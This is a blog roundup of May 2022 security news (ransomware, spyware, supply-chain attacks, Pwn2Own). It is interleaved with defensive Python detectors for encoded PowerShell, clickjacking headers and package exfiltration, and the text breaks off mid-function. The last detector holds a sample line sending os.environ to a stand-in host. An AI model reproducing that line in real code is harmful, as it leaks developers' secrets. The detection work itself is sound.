This posting is here to collect cyber security news in May 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
Tomi Engdahl says:
Forged COVID certificates are being sold to Russians on the Telegram messaging service for trips to Finland; cases have been caught by the Finnish Border Guard https://yle.fi/uutiset/3-12452886?origin=rss
Scammers selling forged COVID certificates sensed a new opportunity, changed their approach and now advertise their services on the Telegram messaging service as a way to get into Finland easily. One advertisement circulating on Telegram reads: “We offer a European certificate of two Pfizer vaccinations without a clinic visit. With the certificate you can cross the border between Russia and Finland.”
Tomi Engdahl says:
Russian Sberbank says it’s facing massive waves of DDoS attacks https://www.bleepingcomputer.com/news/security/russian-sberbank-says-it-s-facing-massive-waves-of-ddos-attacks/
Russia’s banking and financial services company Sberbank is being targeted in a wave of unprecedented hacker attacks. Earlier this month, the bank fought off the largest distributed denial-of-service (DDoS) attack in its history.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/russian-sberbank-says-it-s-facing-massive-waves-of-ddos-attacks/
“Today, the bank faces cyberattacks around the clock. Sberbank’s Security Operation Center analyzes cyber threats 24/7 and promptly responds to them,” Sergei Lebed
“However, when it comes to companies in other sectors, most of them have never encountered anything like this before and may suffer damages,” warned Sberbank’s vice president.
DDoS attacks at this level are likely to continue as long as the geopolitical tensions continue to create a polarizing environment, and as Sberbank’s announcement concludes, they may go down in number but grow in power.
This is in line with what Radware reported yesterday, a 36-hour long 1.1 Tbps DDoS attack on a U.S. service provider which signifies that threat actors are becoming far more capable even compared to last year.
Tomi Engdahl says:
Conti ransomware shuts down operation, rebrands into smaller units https://www.bleepingcomputer.com/news/security/conti-ransomware-shuts-down-operation-rebrands-into-smaller-units/
The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more. This news comes from Advanced Intel’s Yelisey Boguslavskiy, who tweeted this afternoon that the gang’s internal infrastructure was turned off. While the Conti ransomware brand is no more, the cybercrime syndicate will continue to play a significant role in the ransomware industry for a long time to come.
Boguslavskiy told BleepingComputer that instead of rebranding as another large ransomware operation, the Conti leadership has instead partnered with other smaller ransomware gangs to conduct attacks.
Tomi Engdahl says:
Microsoft emergency updates fix Windows AD authentication issues https://www.bleepingcomputer.com/news/microsoft/microsoft-emergency-updates-fix-windows-ad-authentication-issues/
Microsoft has released emergency out-of-band (OOB) updates to address Active Directory (AD) authentication issues after installing Windows Updates issued during the May 2022 Patch Tuesday on domain controllers.
Tomi Engdahl says:
Fake domains offer Windows 11 installers – but deliver malware instead
https://www.zdnet.com/article/fake-domains-offer-windows-11-installers-but-deliver-malware-instead/#ftag=RSSbaffb68
Security researchers have found a new collection of phishing domains offering up fake Windows 11 installers that actually deliver information-stealing malware. Cybersecurity firm Zscaler said that newly registered domains appeared in April 2022 and have been designed to mimic the legitimate Microsoft Windows 11 OS download portal.
‘Warez’ sites containing pirate material, including software and games, are notorious as hotbeds of malicious malware packages, including Trojans, information stealers, adware, and nuisanceware.
Tomi Engdahl says:
Mirai Malware Variants for Linux Double Down on Stronger Chips in Q1 2022
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/
Popular for compromising internet-connected devices and conducting distributed denial of service (DDoS) attacks, Mirai malware variants have been known to compromise devices that run on Linux builds ranging from mobile and Internet of Things (IoT) devices to cloud infrastructures. According to internal and open-source data analyzed by the CrowdStrike malware research team, while the ARM CPU architecture (used in most mobile and IoT devices) remains the most prevalent among Mirai variants, the number of 32-bit x86 Mirai variants (used on Linux servers and networking equipment) increased by 120% in Q1 2022 compared to Q1 2021.
Tomi Engdahl says:
CrateDepression | Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/
SentinelLabs has investigated a supply-chain attack against the Rust development community that we refer to as ‘CrateDepression’.
Tomi Engdahl says:
Windows 11 Gets Slaughtered At Pwn2Own, Tesla Model 3 Hacked As Well https://hothardware.com/news/windows-11-slaughtered-at-pwn2own
The contest awarded a total of $1,155,000 this year, and the biggest payouts were for serious exploits against Microsoft’s Teams utility.
While Teams isn’t technically a part of Windows, it does come bundled with all new installs of Windows 11, which means that these exploits are practically Windows exploits. Hector “p3rr0” Peralta, Masato Kinugawa, and STAR Labs each earned $150,000 for major exploits of the utility. Windows 11 itself wasn’t spared, though. Marcin Wizowski and STAR Labs each earned $40,000 for privilege escalation exploits on Microsoft’s operating system on day one, and on day two, TO found a similar bug for a $40,000 payout of his own. Day three saw no less than three more fresh exploits against Windows 11, all in the serious privilege escalation category; all three winners pocketed another $40,000. As far as the Tesla Model 3 goes, Synacktiv were able to demonstrate a sandbox escape exploit on the car’s infotainment system.
That could allow an attacker to take control of the car’s built-in computer and, given another couple of clever exploits, could feasibly be the first step toward a remote attacker taking control of the car’s autopilot system. The group earned $75,000 for the bug. Other targets attacked at Pwn2Own 2022 included Mozilla Firefox (hacked), Apple Safari (hacked), and Ubuntu Desktop (hacked). There were a few failures, although the Zero-Day Initiative, who sponsors the contest, noted that most of the failed hacks were valid, and that the security specialists simply weren’t able to get them working within the limited time allotted to do so.
Tomi Engdahl says:
PDF smuggles Microsoft Word doc to drop Snake Keylogger malware https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/
Threat analysts have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware. The choice of PDFs is unusual, as most malicious emails today arrive with DOCX or XLS attachments laced with malware-loading macro code. In a campaign seen by HP Wolf Security, the PDF arriving via email is named “Remittance Invoice,” and our guess is that the email body contains vague promises of payment to the recipient.
Tomi Engdahl says:
Google: Predator spyware infected Android devices using zero-days https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/
Google’s Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. In these attacks, part of three campaigns that started between August and October 2021, the attackers used zero-day exploits targeting Chrome and the Android OS to install Predator spyware implants on fully up-to-date Android devices. “We assess with high confidence that these exploits were packaged by a single commercial surveillance company, Cytrox, and sold to different government-backed actors who used them in at least the three campaigns discussed below,” said Google TAG members Clement Lecigne and Christian Resell. The government-backed malicious actors who purchased and used these exploits to infect Android targets with spyware are from Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia, according to Google’s analysis.
Tomi Engdahl says:
Threat Actors Abuse Microsoft’s HTML help file to Deliver Malware – Security Investigation
https://www.socinvestigation.com/threat-actors-abuse-microsofts-html-help-file-to-deliver-malware/
Security Researchers at Malwarebytes have discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact a decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer. The threat actors used the domain to host a website that looked like the official Baden-Württemberg website, baden-wuerttemberg.de.
The attackers created the perfect placeholder for the lure they wanted their victims to download: a file called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.
Victims will get a fake error message when they open up that file, while PowerShell quietly runs a Base64 command.
Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid.
Tomi Engdahl says:
IBM Dives Into TrickBot Gang’s Malware Crypting Operation
https://www.securityweek.com/ibm-dives-trickbot-gangs-malware-crypting-operation
Researchers with IBM Security’s X-Force division have analyzed 13 crypters employed by the cybercrime group behind the infamous TrickBot and Conti malware.
The use of crypters to obfuscate malware in order to evade antivirus detection is not new, but TrickBot’s operators – which are known as Wizard Spider, ITG23, or the Trickbot Group – took this practice to a new level, by automating the crypting of malware at scale with the launch of a Jenkins build server.
The TrickBot malware family emerged in 2016, when it mainly facilitated online banking fraud. The malware has evolved into helping the mass distribution of other malware families, and the cybercrime group behind it has widened its activities as well.
Wizard Spider, IBM says, has expanded operations with the deployment of BazarLoader and Anchor, and stepped deep into the ransomware business, with Diavol, Ryuk, and Conti. The tight connection between Conti and TrickBot has been long known, and a report earlier this year suggested that Conti bought TrickBot sometime around the end of 2021.
“ITG23 is best thought of as a group of groups, not unlike a large corporation, who report to common ‘upper management’ and share infrastructure and support functions, such as IT and human resources. One of these support groups within ITG23 is dedicated to developing crypters for use with the group’s own malware operations as well as for several other groups,” IBM explains.
Tomi Engdahl says:
Breach Exposed Data of Half-Million Chicago Students, Staff
https://www.securityweek.com/breach-exposed-data-half-million-chicago-students-staff
The personal information of more than half a million Chicago Public Schools students and staff was compromised in a ransomware attack last December, but the vendor didn’t report it to the district until last month, officials said.
The data breach occurred Dec. 1 and technology vendor Battelle for Kids notified CPS on April 26, the district said Friday. A server used to store student and staff information was breached and four years’ worth of records were accessed, CPS said.
In total, 495,448 student and 56,138 employee records were accessed from 2015-16 through 2018-2019 school years, CPS said. The data included students’ names, schools, dates of birth, gender, CPS identification numbers, state student identification numbers, class schedule information and scores on course-specific assessments used for teacher evaluations.
Employee data accessed for those years included names, employee identification numbers, school and course information and emails and usernames.
CPS said the breached server did not store any other records.
Tomi Engdahl says:
Nikkei Says Customer Data Likely Impacted in Ransomware Attack
https://www.securityweek.com/nikkei-says-customer-data-likely-impacted-ransomware-attack
Asian media giant Nikkei has disclosed a ransomware attack that might have impacted customer data.
Based in Tokyo, Nikkei, Inc. is a media company specialized in business, financial, and industry news, and which owns Financial Times and The Nikkei. With a daily circulation of over 3 million, The Nikkei is the world’s largest financial newspaper.
On Thursday, Nikkei announced that a server at its headquarters in Singapore was infected with ransomware last week.
“Unauthorized access to the server was first detected on May 13, prompting an internal probe. Nikkei Group Asia immediately shut down the affected server and took other measures to minimize the impact,” the media giant said.
Tomi Engdahl says:
New Brute Force Attacks Against SQL Servers Use PowerShell Wrapper
https://www.securityweek.com/new-brute-force-attacks-against-sql-servers-use-powershell-wrapper
Microsoft has warned organizations of a new wave of brute force cyberattacks that target SQL servers and use a rather uncommon living-off-the-land binary (LOLBin).
Specifically, the attackers rely on a legitimate utility called sqlps.exe to achieve fileless persistence on SQL servers that use weak or default passwords.
According to Microsoft, sqlps.exe, a PowerShell wrapper that supports the execution of SQL-built cmdlets, allows the attackers to run recon commands and to modify the start mode of the SQL service to LocalSystem.
The use of a legitimate tool also enables the attackers to keep their malicious activity hidden from detection tools and it also hinders forensic analysis.
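Both the sqlps.exe abuse described in this post and the Base64-encoded PowerShell command in the earlier Malwarebytes item are cases where a legitimate binary does the attacker's work, so the detection has to look at what was launched and how. The following is an added example (not code from Microsoft, Malwarebytes or the articles) that triages process-creation events for exactly those two patterns: any sqlps.exe launch, a sqlps.exe command line that reconfigures a service, and a PowerShell host started with -EncodedCommand, whose payload it decodes for the analyst. The event records are constructed and their field layout (host, user, image, cmdline) is an assumption, not the shape of any particular telemetry product.

```python
"""Triage constructed Windows process-creation events for LOLBin patterns:
sqlps.exe launches (especially ones touching service configuration) and
PowerShell invoked with a base64 -EncodedCommand. Added example; event
shape (host, user, image, cmdline) is a simplified assumption."""
from __future__ import annotations

import base64
import re
from typing import Iterable, Optional

# Constructed sample events. Paths, hosts, users and command lines are invented.
_ENCODED = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"host": "sql01", "user": "NT SERVICE\\MSSQLSERVER",
     "image": "C:\\SQLTools\\sqlps.exe",
     "cmdline": 'sqlps.exe -NoLogo -Command "Get-ChildItem SQLSERVER:\\SQL\\localhost"'},
    {"host": "sql01", "user": "NT SERVICE\\MSSQLSERVER",
     "image": "C:\\SQLTools\\sqlps.exe",
     "cmdline": 'sqlps.exe -Command "Set-Service MSSQLSERVER -StartupType Automatic"'},
    {"host": "ws07", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": f"powershell.exe -w hidden -EncodedCommand {_ENCODED}"},
    {"host": "ws07", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Service-configuration changes issued from a PowerShell host: Set-Service or sc config.
SERVICE_CHANGE = re.compile(r"\bSet-Service\b|\bsc(?:\.exe)?\s+config\b", re.I)
# PowerShell's -EncodedCommand and its accepted abbreviations, followed by base64 text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def triage(event: dict) -> list[str]:
    """Return human-readable findings for one event (empty list means nothing notable)."""
    findings: list[str] = []
    image = event["image"].lower()
    cmdline = event["cmdline"]
    if image.endswith("sqlps.exe"):
        findings.append("sqlps.exe launched: uncommon LOLBin, verify the operator and intent")
        if SERVICE_CHANGE.search(cmdline):
            findings.append("sqlps.exe command line changes a service configuration")
    if image.endswith(("powershell.exe", "pwsh.exe", "sqlps.exe")):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append(f"encoded PowerShell command, decodes to {decoded!r}")
    return findings


def triage_all(events: Iterable[dict]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events with at least one finding."""
    return {i: f for i, e in enumerate(events) if (f := triage(e))}


if __name__ == "__main__":
    for index, findings in triage_all(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["host"], findings)
```

sqlps.exe is flagged on sight rather than only when it misbehaves because legitimate interactive use of it is rare on a production SQL host; tuning that rule to the accounts and hosts that genuinely use it is the first thing to do after deploying it. The decoder is deliberately lenient about the flag spelling, since PowerShell accepts any unambiguous prefix of -EncodedCommand.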
Tomi Engdahl says:
DoJ Will No Longer Use CFAA to Charge Ethical Hackers
https://www.securityweek.com/doj-will-no-longer-use-cfaa-charge-ethical-hackers
The United States Department of Justice has announced that it would no longer charge ethical hackers under the controversial Computer Fraud and Abuse Act (CFAA).
Ethical hacking, the DoJ explains, represents the good-faith security research where a computer is accessed only for investigating, testing, or identifying vulnerabilities, with the purpose of improving security as a whole.
Good-faith security research “is carried out in a manner designed to avoid any harm to individuals or the public, and where the information derived from the activity is used primarily to promote the security or safety of the class of devices, machines, or online services to which the accessed computer belongs, or those who use such devices, machines, or online services,” the updated policy reads.
The DoJ also makes it clear that the “goals for CFAA enforcement are to promote privacy and cybersecurity by upholding the legal right of individuals, network owners, operators, and other persons to ensure the confidentiality, integrity, and availability of information stored in their information systems.”
9-48.000 – COMPUTER FRAUD AND ABUSE ACT
https://www.justice.gov/opa/press-release/file/1507126/download
The Computer Fraud and Abuse Act (“CFAA”), codified at Title 18, United States Code, Section 1030, is an important law for prosecutors to address cyber-based crimes. As technology and criminal behavior continue to evolve, however, it also remains important that the CFAA be applied consistently by attorneys for the government and that the public better understand how the Department applies the law.
To accomplish these goals, the Department has developed the following policy to guide attorneys for the government in the appropriate considerations for prosecutors contemplating charges under the CFAA.
The Department’s goals for CFAA enforcement are to promote privacy and cybersecurity by upholding the legal right of individuals, network owners, operators, and other persons to ensure the confidentiality, integrity, and availability of information stored in their information systems.
Tomi Engdahl says:
Researchers Spot Supply Chain Attack Targeting GitLab CI Pipelines
https://www.securityweek.com/researchers-spot-supply-chain-attack-targeting-gitlab-ci-pipelines
Security researchers at SentinelLabs are calling attention to a software supply chain attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines.
The campaign, dubbed CrateDepression, combines typosquatting and the impersonation of a known Rust developer to push a malicious ‘crate’ hosted on the Rust dependency community repository. (Editor’s note: A crate is a compilation unit in Rust).
The malicious crate was swiftly flagged and removed, but SentinelLabs researchers found a second-stage payload built exclusively for GitLab CI pipelines, signaling a risk of further larger-scale supply-chain attacks.
“Given the nature of the victims targeted, this attack would serve as an enabler for subsequent supply-chain attacks at a larger-scale relative to the development pipelines infected,” SentinelLabs said in a technical report documenting its findings.
https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/
Tomi Engdahl says:
Cisco Warns of Exploitation Attempts Targeting New IOS XR Vulnerability
https://www.securityweek.com/cisco-warns-exploitation-attempts-targeting-new-ios-xr-vulnerability
Cisco informed customers on Friday that it’s aware of in-the-wild exploitation attempts targeting a new vulnerability affecting its IOS XR software.
The flaw, tracked as CVE-2022-20821, was discovered by Cisco during the resolution of a support case. Exploitation attempts were identified sometime this month, but no additional information has been made available regarding these attacks.
The vulnerability, which has a “medium severity” rating based on its CVSS score of 6.5, can allow a remote, unauthenticated attacker to access a Redis instance that is running within a container named “NOSi.”
The issue affects the health check RPM in IOS XR software and is related to the TCP port 6379, which the RPM opens by default on activation.
“An attacker could exploit this vulnerability by connecting to the Redis instance on the open port. A successful exploit could allow the attacker to write to the Redis in-memory database, write arbitrary files to the container filesystem, and retrieve information about the Redis database,” Cisco said in its advisory.
Tomi Engdahl says:
Android phones were spied on: Google made a worrying discovery https://www.is.fi/digitoday/tietoturva/art-2000008836228.html
GOOGLE reports five vulnerabilities in the Chrome browser and the Android operating system that the commercial spyware company Cytrox packaged into a product for sale last year. Google:
https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/
Tomi Engdahl says:
New RansomHouse group sets up extortion market, adds first victims https://www.bleepingcomputer.com/news/security/new-ransomhouse-group-sets-up-extortion-market-adds-first-victims/
Yet another data-extortion cybercrime operation has appeared on the darknet named ‘RansomHouse’ where threat actors publish evidence of stolen files and leak data of organizations that refuse to make a ransom payment. The new operation claims not to use any ransomware and instead focuses on breaching networks through alleged vulnerabilities to steal a target’s data.
Tomi Engdahl says:
Russian hackers perform reconnaissance against Austria, Estonia https://www.bleepingcomputer.com/news/security/russian-hackers-perform-reconnaissance-against-austria-estonia/
In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College. This discovery comes from cybersecurity firm Sekoia, which built upon previous findings of Google’s TAG, which has been following Russian hackers closely this year.
Tomi Engdahl says:
New Unpatched Bug Could Let Attackers Steal Money from PayPal Users https://thehackernews.com/2022/05/paypal-pays-hacker-200000-for.html
A security researcher claims to have discovered an unpatched vulnerability in PayPal’s money transfer service that could allow attackers to trick victims into unknowingly completing attacker-directed transactions with a single click. Clickjacking, also called UI redressing, refers to a technique wherein an unwitting user is tricked into clicking seemingly innocuous webpage elements like buttons with the goal of downloading malware, redirecting to malicious websites, or disclose sensitive information. This is typically achieved by displaying an invisible page or HTML element on top of the visible page, resulting in a scenario where users are fooled into thinking that they are clicking the legitimate page when they are in fact clicking the rogue element overlaid atop it.
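Clickjacking works only if the target page can be loaded inside an attacker-controlled frame, so the corresponding defence is a response header that forbids framing. The following added example (not from the article or from PayPal) evaluates a set of HTTP response headers the way a browser would: a CSP frame-ancestors directive takes precedence when present, X-Frame-Options DENY or SAMEORIGIN counts otherwise, and the obsolete ALLOW-FROM form is not counted because current browsers ignore it. The sample header sets are constructed.

```python
"""Check whether an HTTP response's headers prevent the page from being framed,
the server-side defence against clickjacking. Added example; the sample
responses below are constructed."""
from __future__ import annotations

from typing import Optional

# Constructed header sets standing in for four different server configurations.
SAMPLE_RESPONSES = {
    "hardened": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
                 "X-Frame-Options": "DENY"},
    "legacy-only": {"X-Frame-Options": "SAMEORIGIN"},
    "unprotected": {"Content-Type": "text/html"},
    # frame-ancestors wins over X-Frame-Options, so this DENY is ignored by browsers.
    "misconfigured": {"Content-Security-Policy": "frame-ancestors *",
                      "X-Frame-Options": "DENY"},
}


def csp_frame_ancestors(csp: str) -> Optional[list[str]]:
    """Return the frame-ancestors source list from a CSP header, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return parts[1:]
    return None


def assess_framing_protection(headers: dict[str, str]) -> dict:
    """Decide whether the response forbids or restricts embedding in a frame."""
    lower = {k.lower(): v for k, v in headers.items()}
    mechanisms: list[str] = []
    notes: list[str] = []
    xfo = lower.get("x-frame-options", "").strip().upper()
    ancestors = csp_frame_ancestors(lower.get("content-security-policy", ""))

    if ancestors is not None:
        # CSP frame-ancestors is authoritative when present.
        if xfo:
            notes.append("X-Frame-Options also set but ignored when frame-ancestors is present")
        if not ancestors:
            notes.append("frame-ancestors has an empty source list; treat as misconfigured")
        elif "*" in ancestors:
            notes.append("frame-ancestors * allows framing from anywhere")
        else:
            mechanisms.append(f"CSP frame-ancestors {' '.join(ancestors)}")
    elif xfo in ("DENY", "SAMEORIGIN"):
        mechanisms.append(f"X-Frame-Options {xfo}")
    elif xfo.startswith("ALLOW-FROM"):
        notes.append("X-Frame-Options ALLOW-FROM is obsolete and ignored by modern browsers")
    elif xfo:
        notes.append(f"unrecognised X-Frame-Options value {xfo!r}")
    else:
        notes.append("no framing restriction header at all")

    return {"protected": bool(mechanisms), "mechanisms": mechanisms, "notes": notes}


def audit_all(responses: dict[str, dict[str, str]]) -> dict[str, bool]:
    """Map each named response to whether it is protected against framing."""
    return {name: assess_framing_protection(h)["protected"] for name, h in responses.items()}


if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        print(name, assess_framing_protection(headers))
```

A restrictive frame-ancestors list ('none', 'self', or a list of explicit origins) is counted as protection even when it permits some framing, since the page then cannot be framed by an arbitrary attacker origin; the "misconfigured" sample shows why a DENY header alone is not enough to conclude a site is safe.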
Tomi Engdahl says:
381,000-plus Kubernetes API servers ‘exposed to internet’
https://www.theregister.com/2022/05/23/kubernetes-vulnerable-shadowserver/
A large number of servers running the Kubernetes API have been left exposed to the internet, which is not great: they’re potentially vulnerable to abuse. Nonprofit security organization The Shadowserver Foundation recently scanned 454,729 systems hosting the popular open-source platform for managing and orchestrating containers, finding that more than 381,645 or about 84 percent are accessible via the internet to varying degrees, thus providing a cracked door into a corporate network.
Tomi Engdahl says:
Ukraine war as bait: China spied on Russian military secrets https://www.is.fi/digitoday/tietoturva/art-2000008831119.html
CHINA succeeded in penetrating a Russian defence company as part of a campaign that lasted nearly 11 months, security company Check Point reports. The campaign, dubbed Twisted Panda, claimed two victims at a Russian holding company operating under the state-owned defence company Rostec. The attackers used carefully crafted and targeted emails. On 23 March this year, emails were sent to several defence research institutes in Russia.
Tomi Engdahl says:
Ransomware attack exposes data of 500,000 Chicago students https://www.bleepingcomputer.com/news/security/ransomware-attack-exposes-data-of-500-000-chicago-students/
The Chicago Public Schools has suffered a massive data breach that exposed the data of almost 500,000 students and 60,000 employees after their vendor, Battelle for Kids, suffered a ransomware attack in December. Ohio-based Battelle for Kids is a not-for-profit educational organization that analyzes student data shared by public school systems to design instructional models and evaluate teacher performance.
Tomi Engdahl says:
Malicious PyPI package opens backdoors on Windows, Linux, and Macs https://www.bleepingcomputer.com/news/security/malicious-pypi-package-opens-backdoors-on-windows-linux-and-macs/
Yet another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems. PyPI is a repository of open-source packages that developers can use to share their work or benefit from the work of others, downloading the functional libraries required for their projects.
Tomi Engdahl says:
Conti Ransomware Operation Shut Down After Brand Becomes Toxic
https://www.securityweek.com/conti-ransomware-operation-shut-down-after-brand-becomes-toxic
The Conti ransomware operation has undergone some significant organizational structure changes in the past months after the brand became toxic due to its affiliation with the Russian government.
The Conti operation has been highly successful, helping cybercriminals make billions of dollars after breaching the systems of hundreds of major organizations. While it appeared to be very active, threat intelligence company AdvIntel says the group has been in the process of shutting down the Conti brand and switching to a different organizational structure that involves multiple subgroups.
The Conti brand’s downfall appears to have started in late February, after Russia launched an invasion of Ukraine. Shortly after the war began, Conti pledged its support for the Russian government and threatened to attack the critical infrastructure of its enemies.
Tomi Engdahl says:
Over $1.1 Million Awarded at Pwn2Own Vancouver 2022 for 25 Zero-Day Vulnerabilities
https://www.securityweek.com/over-11-million-awarded-pwn2own-vancouver-2022-25-zero-day-vulnerabilities
Participants earned a total of more than $1.15 million at the Pwn2Own Vancouver 2022 hacking contest last week.
According to Trend Micro’s Zero Day Initiative (ZDI), which organizes the event, rewards were paid out for 25 unique zero-day vulnerabilities that were used to target Tesla Model 3, Windows 11, Ubuntu, Microsoft Teams, Safari, Firefox and Oracle VirtualBox.
A majority of the money was earned on the first day, when researchers demonstrated exploits worth a total of $800,000, including three Microsoft Teams exploit chains that received $150,000 each.
Two teams targeted the Tesla Model 3, but only one of them, representing Synacktiv, was partially successful.
Tomi Engdahl says:
Chrome vulnerabilities were sold in bundles to state actors
https://etn.fi/index.php/13-news/13619-chrome-haavoittuvuuksia-myytiin-paketteina-valtiollisille-toimijoille
Google writes in its security blog that four Chrome browser vulnerabilities and one Android operating system hole have been sold on the black market to state actors. Behind this is Cytrox, which started out as a commercial security company. The buyers are state-backed cybercrime groups operating at least in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia.
Tomi Engdahl says:
Cybersecurity Community Warned of Fake PoC Exploits Delivering Malware
https://www.securityweek.com/cybersecurity-community-warned-fake-poc-exploits-delivering-malware
Researchers have spotted fake proof-of-concept (PoC) exploits that appear to have been created by threat actors in an effort to deliver malware to members of the cybersecurity community.
On May 19, researchers reported that GitHub was hosting malicious software disguised as PoC exploits for a couple of Windows vulnerabilities that Microsoft fixed with its April 2022 Patch Tuesday updates.
The fake PoC exploits, which have since been removed by GitHub, were delivered as executable files that, when run, could open a backdoor to the system.
The PoCs claimed to target CVE-2022-24500 and CVE-2022-26809, both of which can be exploited for remote code execution on Windows systems. While there is no indication that the flaws have been leveraged in attacks, some cybersecurity companies did warn that they could pose a serious risk — CVE-2022-26809, for instance, is believed to be wormable.
Tomi Engdahl says:
The FSB hackers who spied on the Finnish Ministry for Foreign Affairs struck again, this time against military targets
https://www.tivi.fi/uutiset/tv/7dd6b741-7cfd-4188-b181-24c56cb53d69
The Russian state-linked hacker group Turla has been observed infiltrating the systems of the Austrian Economic Chamber and the Baltic Defence College in Estonia. Traces of Turla activity have also been found on NATO’s e-learning platform, Bleeping Computer writes. [This was also in an earlier roundup]
Tomi Engdahl says:
Finland’s largest photo agency targeted by a possible data breach
https://www.tivi.fi/uutiset/tv/d2223782-139d-4798-af94-80c5eae9b1c8
The Finnish photo agency Lehtikuva has contacted its customers by email. The message reports a possible data leak affecting the photo shop’s back-end system. The suspected leak occurred on Thursday 19 May. According to preliminary information, customers’ personal data has not been compromised. Lehtikuva does not store credit card details.
Tomi Engdahl says:
Trend Micro fixes bug Chinese hackers exploited for espionage https://www.bleepingcomputer.com/news/security/trend-micro-fixes-bug-chinese-hackers-exploited-for-espionage/
Trend Micro says it patched a DLL hijacking flaw in Trend Micro Security used by a Chinese threat group to side-load malicious DLLs and deploy malware. As Sentinel Labs revealed in an early-May report, the attackers exploited the fact that security products run with high privileges on Windows to plant and load their own maliciously crafted DLL into memory, allowing them to elevate privileges and execute code.
“For Trend Micro Security (Consumer), a fix was deployed via Trend Micro’s ActiveUpdate (AU) on May 19, 2022, and any user with an active internet connection should receive the update shortly if they have not yet already received it,” the antivirus vendor added.
Tomi Engdahl says:
Popular Python and PHP libraries hijacked to steal AWS keys https://www.bleepingcomputer.com/news/security/popular-python-and-php-libraries-hijacked-to-steal-aws-keys/
PyPI module ‘ctx’ that gets downloaded over 20,000 times a week has been compromised in a software supply chain attack with malicious versions stealing the developer’s environment variables. The threat actor even replaced the older, safe versions of ‘ctx’ with code that exfiltrates the developer’s environment variables, to collect secrets like Amazon AWS keys and credentials. Additionally, versions of a ‘phpass’ fork published to the PHP/Composer package repository Packagist had been altered to steal secrets in a similar fashion.
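The ‘ctx’ hijack combines two behaviours that are individually common in legitimate packages but together, at import or install time, are a strong signal: reading the process environment and sending data over the network. The following added example (not the article’s code, not PyPI’s tooling, and not the real malicious ctx payload) is a small AST-based pre-install scanner that reports both kinds of call site in a Python source file and whether a network call runs at module top level, i.e. during `pip install` for a setup.py or on first import for a module. The two source samples it scans are constructed stand-ins.

```python
"""Static scan of Python package source for environment reads combined with
outbound network calls, the pattern seen in the hijacked 'ctx' release.
Added example; BENIGN_SOURCE and SUSPICIOUS_SOURCE are constructed inputs,
not the real ctx code."""
from __future__ import annotations

import ast
from typing import Optional

# Bare names cover `from os import environ, getenv`; dotted names cover `import os`.
ENV_READS = {"os.environ", "os.getenv", "environ", "getenv"}
# Outbound-network call sites, matched by module prefix or by bare imported name.
NET_PREFIXES = ("requests.", "urllib.request.", "socket.", "http.client.", "httpx.")
NET_NAMES = {"urlopen", "HTTPSConnection", "HTTPConnection"}

BENIGN_SOURCE = '''
import os

def data_dir():
    return os.environ.get("XDG_DATA_HOME", "~/.local/share")
'''

SUSPICIOUS_SOURCE = '''
import json
import os
import urllib.request

payload = json.dumps(dict(os.environ)).encode()
urllib.request.urlopen("https://collector.invalid/", data=payload)
'''


def _dotted(node: ast.AST) -> Optional[str]:
    """Render Name/Attribute chains such as urllib.request.urlopen as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _is_net(name: str) -> bool:
    return name in NET_NAMES or name.startswith(NET_PREFIXES)


def _names(tree: ast.AST):
    """Yield (dotted name, line) for every Name/Attribute node under tree."""
    for node in ast.walk(tree):
        if isinstance(node, (ast.Name, ast.Attribute)):
            name = _dotted(node)
            if name:
                yield name, node.lineno


def scan_source(src: str) -> dict:
    """Report env reads, network sinks, and whether a sink runs at module top level."""
    tree = ast.parse(src)
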